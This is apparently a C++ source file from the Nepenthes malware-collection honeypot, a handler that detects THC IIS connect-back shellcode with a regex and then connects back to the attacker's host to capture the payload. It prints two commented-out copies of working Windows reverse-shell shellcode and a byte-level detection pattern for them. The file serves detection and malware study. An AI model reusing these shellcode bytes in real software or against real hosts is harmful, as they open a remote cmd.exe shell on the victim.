/********************************************************************************
 *                              Nepenthes
 *                        - finest collection -
 *
 *
 *
 * Copyright (C) 2005  Paul Baecher & Markus Koetter
 * 
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 * 
 * 
 *             contact nepenthesdev@users.sourceforge.net  
 *
 *******************************************************************************/

 /* $Id: sch_iis_thc_connect.cpp 2106 2005-10-25 14:28:39Z common $ */

#include <netinet/in.h>
#include <arpa/inet.h>

#include "LogManager.hpp"
#include "Message.hpp"
#include "sch_iis_thc_connect.hpp"
#include "Socket.hpp"
#include "Nepenthes.hpp"
#include "Utilities.hpp"
#include "DialogueFactoryManager.hpp"
#include "SocketManager.hpp"

#include "DialogueFactory.hpp"

#ifdef STDTAGS 
#undef STDTAGS 
#endif
#define STDTAGS l_sc | l_hlr

using namespace nepenthes;

THCConnect::THCConnect(ShellcodeManager *shellcodemanager)
{
	m_ShellcodeManager = shellcodemanager;
	m_ShellcodeHandlerName = "THCConnect";
	m_ShellcodeHandlerDescription = "handles thc iis connectbackshells";
	m_pcre = NULL;
}

THCConnect::~THCConnect()
{

}

bool THCConnect::Init()
{
	logPF();
/*
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

// FIXME differ between v2 & v3
char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";
*/
	const char *thcconnectpcre = //".*(\\xeb\\x25(.*)\\x02\\x06\\x6c\\x59\\x6c\\x59\\xf8).*";
	"\\xEB\\x25(..)(....)\\x02\\x06\\x6C\\x59\\x6C\\x59\\xF8\\x1D"
	"\\x9C\\xDE\\x8C\\xD1\\x4C\\x70\\xD4\\x03\\x58\\x46\\x57\\x53\\x32\\x5F\\x33\\x32"
	"\\x2E\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5D\\x83\\xED\\x2C"
	"\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78\\x08"
	"\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B\\x1C\\x01"
	"\\xF9\\x8B\\x53\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01\\xFB\\x31\\xC9"
	"\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B\\x01\\xFE\\xAC\\x31\\xC2\\xD1\\xE2\\x84\\xC0"
	"\\x75\\xF7\\x0F\\xB6\\x45\\x09\\x8D\\x44\\x45\\x08\\x66\\x39\\x10\\x75\\xE1\\x66"
	"\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E\\x10\\x41\\x0F\\xB7\\x0C\\x4A"
	"\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x09\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x09"
	"\\x75\\xBE\\xFE\\x4D\\x08\\x74\\x17\\xFE\\x4D\\x24\\x8D\\x5D\\x1A\\x53\\xFF\\xD0"
	"\\x89\\xC7\\x6A\\x02\\x58\\x88\\x45\\x09\\x80\\x45\\x79\\x0C\\xEB\\x82\\x50\\x8B"
	"\\x45\\x04\\x35\\x93\\x93\\x93\\x93\\x89\\x45\\x04\\x66\\x8B\\x45\\x02\\x66\\x35"
	"\\x93\\x93\\x66\\x89\\x45\\x02\\x58\\x89\\xCE\\x31\\xDB\\x53\\x53\\x53\\x53\\x56"
	"\\x46\\x56\\xFF\\xD0\\x89\\xC7\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57\\xFF"
	"\\x55\\xE0\\x8D\\x45\\x88\\x50\\xFF\\x55\\xE8\\x55\\x55\\xFF\\x55\\xEC\\x8D\\x44"
	"\\x05\\x0C\\x94\\x53\\x68\\x2E\\x65\\x78\\x65\\x68\\x5C\\x63\\x6D\\x64\\x94\\x31"
	"\\xD2\\x8D\\x45\\xCC\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xCA\\x01\\xF2\\x52\\x94"
	"\\x8D\\x45\\x78\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE"
	"\\x52\\x53\\x53\\x53\\x55\\xFF\\x55\\xF0\\x6A\\xFF\\xFF\\x55\\xE4";

//	logInfo("pcre is %s \n",thcconnectpcre);
    
	const char * pcreEerror;
	int32_t pcreErrorPos;
	if((m_pcre = pcre_compile(thcconnectpcre, PCRE_DOTALL, &pcreEerror, &pcreErrorPos, 0)) == NULL)
	{
		logCrit("THCConnect could not compile pattern \n\t\"%s\"\n\t Error:\"%s\" at Position %u", 
				thcconnectpcre, pcreEerror, pcreErrorPos);
		return false;
	}
	return true;
}

bool THCConnect::Exit()
{
	if(m_pcre != NULL)
    	free(m_pcre);
	return true;

}

sch_result THCConnect::handleShellcode(Message **msg)
{
	logPF();
	logSpam("Shellcode is %i bytes long \n",(*msg)->getSize());
	char *shellcode = (*msg)->getMsg();
	uint32_t len = (*msg)->getSize();

	int32_t piOutput[10 * 3];
	int32_t iResult; 

	if ((iResult = pcre_exec(m_pcre, 0, (char *) shellcode, len, 0, 0, piOutput, sizeof(piOutput)/sizeof(int32_t))) > 0)
	{

		const char * match;
		uint16_t port;
		uint32_t host;


		pcre_get_substring((char *) shellcode, piOutput, iResult, 1, &match);
		port = *(uint16_t *) match;
		port = ntohs(port);
		port = port^0x9393;
		pcre_free_substring(match);

		pcre_get_substring((char *) shellcode, piOutput, iResult, 2, &match);
		host = * ((uint32_t *) match) ^ 0x93939393;
		pcre_free_substring(match);


		logInfo("THC Connectback %s:%i\n",inet_ntoa(*(in_addr *)&host),port);

		Socket *sock = g_Nepenthes->getSocketMgr()->connectTCPHost((*msg)->getLocalHost(),host,port,30);
		DialogueFactory *diaf;
		if ((diaf = g_Nepenthes->getFactoryMgr()->getFactory("WinNTShell DialogueFactory")) == NULL)
		{
			logCrit("%s","No WinNTShell DialogueFactory availible \n");
			return SCH_DONE;
		}
		sock->addDialogue(diaf->createDialogue(sock));
		

		return SCH_DONE;
	}
	return SCH_NOTHING;
}
